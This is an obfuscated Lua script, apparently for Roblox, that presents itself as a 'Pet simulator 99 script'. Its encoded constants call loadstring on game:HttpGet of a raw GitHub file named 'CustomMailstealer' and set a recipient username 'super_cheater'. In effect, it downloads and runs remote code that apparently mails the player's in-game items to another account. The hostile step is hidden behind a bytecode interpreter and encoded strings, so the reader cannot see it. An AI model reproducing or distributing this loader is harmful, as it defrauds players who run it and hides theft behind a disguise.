--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v84=0 -(1637 -(1523 + 114)) ;local v85;while true do if (v84==(0 -0)) then v85=(v31/((3 -1)^(v32-(2 -1))))%(2^(((v33-(1 + 0)) -(v32-(620 -(555 + 64)))) + ((1328 -396) -(857 + 74)))) ;return v85-(v85%1) ;end end else local v86=(1633 -(68 + 997)) -(367 + 201) ;local v87;while true do if (0==v86) then v87=(929 -(214 + (1983 -(226 + 1044))))^(v32-(1 + 0)) ;return (((v31%(v87 + v87))>=v87) and (1 + 0)) or (877 -(282 + 595)) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=0 -0 ;local v35;local v36;local v37;local v38;while true do if (((354 -(87 + 263)) -3)==v34) then return (v38 * (16777333 -(32 + 85))) + (v37 * (64226 + 1310)) + (v36 * (57 + 199)) + v35 ;end if (v34==(957 -(892 + 65))) then v35,v36,v37,v38=v1(v16,v19,v19 + (7 -4) );v19=v19 + 4 ;v34=1 -0 ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=0 -0 ;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v39~=(1765 -(454 + 1309))) then else local v94=0;while true do if (v94~=(1 + 0)) then else v39=3;break;end if (v94==(0 -0)) then v44=nil;v45=nil;v94=1;end end end if (v39==3) then v46=nil;while true do local v98=0;local v99;local v100;while true do if (v98==(0 -0)) then v99=0;v100=nil;v98=2 -1 ;end if (v98~=1) then else while true do if (v99==0) then v100=0;while true do if (v100==(285 -(134 + 151))) then local v144=0;local v145;while true do if ((1665 -(970 + 695))==v144) then v145=0 -0 ;while true do if (v145~=(1990 -(582 + 1408))) then else local v169=0;while true do if (v169~=(3 -2)) then else v145=1 -0 ;break;end if (v169==0) then if (2~=v40) then else local v172=0 -0 ;local v173;local v174;while true do if (1==v172) then while true do if (v173~=0) then else v174=1824 -(1195 + 629) ;while true do local v180=0 -0 ;while true do if (v180~=(241 -(187 + 54))) then else if (v174~=(781 -(162 + 618))) then else return v44;end if (v174~=0) then else local v186=0 + 0 ;while true do if ((0 + 0)==v186) then for v190=1 -0 ,v24() do local v191=0 -0 ;local v192;local v193;local v194;while true do if (v191~=0) then else local v197=0 + 0 ;while true do if (v197==1) then v191=1637 -(1373 + 263) ;break;end if (v197~=(1000 -(451 + 549))) then else v192=0;v193=nil;v197=1;end end end if (v191==(1 + 0)) then v194=nil;while true do if (v192~=1) then else while true do if (v193==0) then v194=v22();if (v21(v194,1 -0 ,1 -0 )~=(1384 -(746 + 638))) then else local v198=0 + 0 ;local v199;local v200;local v201;while true do if (v198~=(0 -0)) then else local v202=0;while true do if (v202~=(341 -(218 + 123))) then else local v208=1581 -(1535 + 46) ;while true do if (v208~=(1 + 0)) then else v202=1;break;end if (v208~=0) then else v199=v21(v194,1 + 1 ,563 -(306 + 254) );v200=v21(v194,4,6);v208=1 + 0 ;end end end if (v202~=(1 -0)) then else v198=1;break;end end end if ((1468 -(899 + 568))==v198) then local v203=0 + 0 ;while true do if (v203~=(0 -0)) then else local v209=603 -(268 + 335) ;while true do if (v209==(291 -(60 + 230))) then v203=1;break;end if (v209==(572 -(426 + 146))) then v201={v23(),v23(),nil,nil};if (v199==0) then local v214=0;local v215;local v216;while true do if (v214==0) then v215=0 -0 ;v216=nil;v214=1;end if (v214~=1) then else while true do if ((0 + 0)~=v215) then else v216=1024 -(706 + 318) ;while true do if (v216==(1251 -(721 + 530))) then v201[1274 -(945 + 326) ]=v23();v201[9 -5 ]=v23();break;end end break;end end break;end end elseif (v199==(1 + 0)) then v201[3]=v24();elseif (v199==2) then v201[3]=v24() -(2^(716 -(271 + 429))) ;elseif (v199==(3 + 0)) then local v219=0;while true do if (v219==(1500 -(1408 + 92))) then v201[1089 -(461 + 625) ]=v24() -(2^16) ;v201[1292 -(993 + 295) ]=v23();break;end end end v209=1;end end end if ((1 + 0)==v203) then v198=2;break;end end end if (3==v198) then if (v21(v200,3,3)==(1172 -(418 + 753))) then v201[2 + 2 ]=v46[v201[4]];end v41[v190]=v201;break;end if (2==v198) then local v205=0 + 0 ;while true do if (v205~=0) then else if (v21(v200,1,1 + 0 )==1) then v201[1 + 1 ]=v46[v201[531 -(406 + 123) ]];end if (v21(v200,2,2)==(1770 -(1749 + 20))) then v201[3]=v46[v201[1 + 2 ]];end v205=1;end if (1==v205) then v198=1325 -(1249 + 73) ;break;end end end end end break;end end break;end if (v192==(0 + 0)) then v193=0;v194=nil;v192=1146 -(466 + 679) ;end end break;end end end for v195=2 -1 ,v24() do v42[v195-(2 -1) ]=v29();end v186=1901 -(106 + 1794) ;end if (v186~=1) then else v174=1;break;end end end break;end end end break;end end break;end if (v172==0) then v173=0;v174=nil;v172=1;end end end if ((1 + 0)~=v40) then else local v175=0 + 0 ;local v176;while true do if (0==v175) then v176=0;while true do if ((5 -3)==v176) then v40=5 -3 ;break;end if (0~=v176) then else local v177=114 -(4 + 110) ;local v178;while true do if (v177~=(584 -(57 + 527))) then else v178=1427 -(41 + 1386) ;while true do if (v178==1) then v176=1;break;end if (v178==0) then v45=v24();v46={};v178=104 -(17 + 86) ;end end break;end end end if (v176==(1 + 0)) then for v181=1,v45 do local v182=0 -0 ;local v183;local v184;local v185;while true do if ((2 -1)~=v182) then else v185=nil;while true do if (v183==0) then local v187=166 -(122 + 44) ;local v188;while true do if (v187==0) then v188=0 -0 ;while true do if (v188==1) then v183=1;break;end if (v188~=(0 -0)) then else v184=v22();v185=nil;v188=1;end end break;end end end if (v183~=(1 + 0)) then else if (v184==1) then v185=v22()~=0 ;elseif (v184==2) then v185=v25();elseif (v184==3) then v185=v26();end v46[v181]=v185;break;end end break;end if (0~=v182) then else v183=0;v184=nil;v182=1;end end end v44[1 + 2 ]=v22();v176=3 -1 ;end end break;end end end v169=66 -(30 + 35) ;end end end if (v145~=(1 + 0)) then else v100=1;break;end end break;end end end if ((1258 -(1043 + 214))~=v100) then else if (v40~=(0 -0)) then else local v160=0;local v161;while true do if (v160==(1212 -(323 + 889))) then v161=0;while true do if (v161~=(0 -0)) then else local v170=580 -(361 + 219) ;while true do if ((321 -(53 + 267))==v170) then v161=1;break;end if (v170==0) then v41={};v42={};v170=1;end end end if (v161~=2) then else v40=1;break;end if (v161==(1 + 0)) then local v171=0;while true do if (v171~=0) then else v43={};v44={v41,v42,nil,v43};v171=1;end if (v171~=(983 -(18 + 964))) then else v161=2;break;end end end end break;end end end break;end end break;end end break;end end end break;end if (v39~=0) then else local v95=0;while true do if (v95~=0) then else v40=0;v41=nil;v95=3 -2 ;end if (v95==(1 + 0)) then v39=1 + 0 ;break;end end end if (v39==1) then local v96=850 -(20 + 830) ;local v97;while true do if (v96~=0) then else v97=0;while true do if (v97~=0) then else local v107=0;while true do if (v107==1) then v97=1 + 0 ;break;end if (v107~=0) then else v42=nil;v43=nil;v107=127 -(116 + 10) ;end end end if (v97~=(1 + 0)) then else v39=2;break;end end break;end end end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=(537 + 201) -(542 + 196) ;local v48;local v49;local v50;local v51;local v52;local v53;while true do if (v47==(6 -3)) then if (v52==(0 + 0 + 0)) then if (v51==(0 + 0)) then return v53 * ((0 -0) + 0) ;else v52=(4 -2) -(754 -(239 + 514)) ;v50=0 -0 ;end elseif (v52==(3598 -(1126 + 425))) then return ((v51==((1607 -(373 + 829)) -(118 + 287))) and (v53 * ((3 -2)/(1121 -((849 -(476 + 255)) + 1003))))) or (v53 * NaN) ;end return v8(v53,v52-((4123 -(369 + 761)) -1970) ) * (v50 + (v51/((379 -(142 + 235))^((136 + 99) -183)))) ;end if (v47==(1 + 0)) then v50=1;v51=(v21(v49,978 -(553 + 424) ,37 -17 ) * ((2 + 0 + 0)^((57 -25) + 0))) + v48 ;v47=2;end if (v47==(2 + 0)) then v52=v21(v49,21,14 + 17 );v53=((v21(v49,19 + 13 )==(2 -1)) and  -(2 -1)) or (1330 -(797 + 532)) ;v47=6 -3 ;end if (v47==0) then v48=v24();v49=v24();v47=1;end end end v26=nil;function v26(v54)local v55;if  not v54 then v54=v24();if (v54==(0 -0)) then return "";end end v55=v3(v16,v19,(v19 + v54) -1 );v19=v19 + v54 ;local v56={};for v68=239 -(64 + 174) , #v55 do v56[v68]=v2(v1(v3(v55,v68,v68)));end return v6(v56);end v18=5;end if (v18==2) then function v22()local v57=v1(v16,v19,v19);v19=v19 + 1 ;return v57;end v23=nil;function v23()local v58=0 + 0 ;local v59;local v60;while true do if (v58==(1 -(0 + 0))) then return (v60 * 256) + v59 ;end if (v58==(336 -(144 + 192))) then v59,v60=v1(v16,v19,v19 + (218 -(42 + 174)) );v19=v19 + 2 + 0 ;v58=1 + 0 ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v61)if (v1(v61,2)==79) then local v88=0;while true do if (v88==0) then v20=v0(v3(v61,1,1));return "";end end else local v89=0;local v90;while true do if (v89==0) then v90=v2(v0(v61,16));if v20 then local v105=0;local v106;while true do if (0==v105) then v106=v5(v90,v20);v20=nil;v105=1;end if (1==v105) then return v106;end end else return v90;end break;end end end end);v18=1;end if (v18==7) then function v30(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v70=v65;local v71=v66;local v72=v67;local v73=v28;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v91=0,v78 do if (v91>=v72) then v76[v91-v72 ]=v77[v91 + 1 ];else v80[v91]=v77[v91 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do v82=v70[v74];v83=v82[1];if (v83<=9) then if (v83<=4) then if (v83<=1) then if (v83>0) then if ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v64;else v80[v82[2]]=v64[v82[3]];end else v74=v82[3];end elseif (v83<=2) then local v109=0;local v110;while true do if (v109==0) then v110=v82[2];v80[v110]=v80[v110](v13(v80,v110 + 1 ,v75));break;end end elseif (v83>3) then local v132=0;local v133;local v134;while true do if (v132==0) then v133=v82[2];v134=v80[v82[3]];v132=1;end if (1==v132) then v80[v133 + 1 ]=v134;v80[v133]=v134[v82[4]];break;end end elseif (v80[v82[2]]==v82[4]) then v74=v74 + 1 ;else v74=v82[3];end elseif (v83<=6) then if (v83==5) then if (v80[v82[2]]==v82[4]) then v74=v74 + 1 ;else v74=v82[3];end elseif ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v64;else v80[v82[2]]=v64[v82[3]];end elseif (v83<=7) then v64[v82[3]]=v80[v82[2]];elseif (v83>8) then v80[v82[2]]();else local v139=v82[2];local v140,v141=v73(v80[v139](v13(v80,v139 + 1 ,v82[3])));v75=(v141 + v139) -1 ;local v142=0;for v148=v139,v75 do local v149=0;while true do if (v149==0) then v142=v142 + 1 ;v80[v148]=v140[v142];break;end end end end elseif (v83<=14) then if (v83<=11) then if (v83==10) then local v113=0;local v114;local v115;while true do if (v113==0) then v114=v82[2];v115=v80[v82[3]];v113=1;end if (v113==1) then v80[v114 + 1 ]=v115;v80[v114]=v115[v82[4]];break;end end else local v116=v82[2];v80[v116]=v80[v116](v13(v80,v116 + 1 ,v75));end elseif (v83<=12) then v64[v82[3]]=v80[v82[2]];elseif (v83>13) then do return;end else v80[v82[2]]();end elseif (v83<=16) then if (v83==15) then local v120=0;local v121;local v122;local v123;local v124;while true do if (v120==1) then v75=(v123 + v121) -1 ;v124=0;v120=2;end if (v120==2) then for v157=v121,v75 do v124=v124 + 1 ;v80[v157]=v122[v124];end break;end if (v120==0) then v121=v82[2];v122,v123=v73(v80[v121](v13(v80,v121 + 1 ,v82[3])));v120=1;end end else v80[v82[2]]=v82[3];end elseif (v83<=17) then v80[v82[2]]=v82[3];elseif (v83>18) then do return;end else v74=v82[3];end v74=v74 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0C3O00028O00026O00F03F030D3O00475F4D61696C6D652O7361676503103O00433431382069732074686520676F6174030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269437573746F6D2F6D61696E2F437573746F6D4D61696C737465616C657203083O00557365726E616D65030E3O0073752O7065725F63686561746572030F3O00475F4C6F6164696E675363722O656E03173O005065742073696D756C61746F72202O3920736372697074001E3O0012113O00013O0026033O000D0001000200044O000D0001001211000100043O00120C000100033O001201000100053O001201000200063O002004000200020007001211000400084O0008000200044O000B00013O00022O000D00010001000100044O001D00010026033O00010001000100044O00010001001211000100013O002603000100170001000100044O001700010012110002000A3O00120C000200093O0012110002000C3O00120C0002000B3O001211000100023O002603000100100001000200044O001000010012113O00023O00044O0001000100044O0010000100044O000100012O000E3O00017O00",v9(),...);
